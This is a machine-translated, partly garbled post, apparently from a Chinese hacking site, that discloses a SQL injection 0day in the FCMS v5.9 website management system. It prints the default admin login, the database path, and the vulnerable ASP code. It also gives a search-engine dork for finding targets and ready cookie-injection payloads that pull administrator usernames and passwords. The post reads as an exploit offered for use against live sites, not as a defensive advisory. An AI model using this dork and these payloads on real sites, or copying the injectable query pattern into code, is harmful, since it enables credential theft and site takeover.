Dream Flash website management system FCMS v5. 9 newest vulnerabilities 0day-vulnerability warning-the black bar safety net

2013-05-20T00:00:00
ID MYHACK58:62201338863
Type myhack58
Reporter x0day
Modified 2013-05-20T00:00:00

Description

Dream Flash website management system FCMS v5. 9 the latest vulnerability 0day

The database address: xmlEditor/database/####@@@datas.mdb

Background xmleditor/login. asp admin/admin

Message database: guestbook/db/sywl. asp

the cookie injected into the drain

Vulnerability file:

xml/text. asp

Vulnerability code:


<!–# include file=”../conn. asp”–> //contains filtered get and post the file, but ignored the cookies

<%

flowNo = Request(“flowNo”) //Request get not only get and post Oh~~it!

if flowNo <> “” then //flowNo if it is not equal to null just to perform to you!

set rs=server. CreateObject(“ADODB. RecordSet”)

rs. Source=”select * from xmlContent where flowNo=”&flowNo

rs. Open rs. Source,conn,1,1

//the xml syntax, burst information will appear in the title inside~it!

Response. Write “<? xml version='1.0' encoding='utf-8'?& gt;”&chr(1 3)

Response. Write “<main>” & chr(1 3)

Response. Write “<title><! [CDATA["

Response. Write rs("tx")

Response. Write "]]></title>”& chr(1 3)

Response. Write “<text><! [CDATA["

Response. Write rs("description")

Response. Write "]]></text>”& chr(1 3)

rs. Close

Set rs=nothing

conn. Close

Set conn=nothing

Response. Write “</main>”

end if

%>


Brief description: in fact, this cookie injection vulnerability in the root directory of the new. the asp file also exists, but the use of inconvenient, and a custom jump home==~to! However, in the text. asp this file inside hasn't added anything to jump or the like, so the use of easy~!

Keywords: inurl:”xmleditor/login. asp”

EXP:

javascript:alert(document. cookie=”flowNo=”+escape(“1 4 union select 1,2,3,adminname from XmlAdmin”));

javascript:alert(document. cookie=”flowNo=”+escape(“1 4 union select 1,2,3,adminpwd from XmlAdmin”));

PS:note that this EXP exploits appear somewhere not in the page Oh, the page is blank, broke the account and password is appear in the title which is the title of~ it! Please carefully observe the Oh~it!

Sleep~!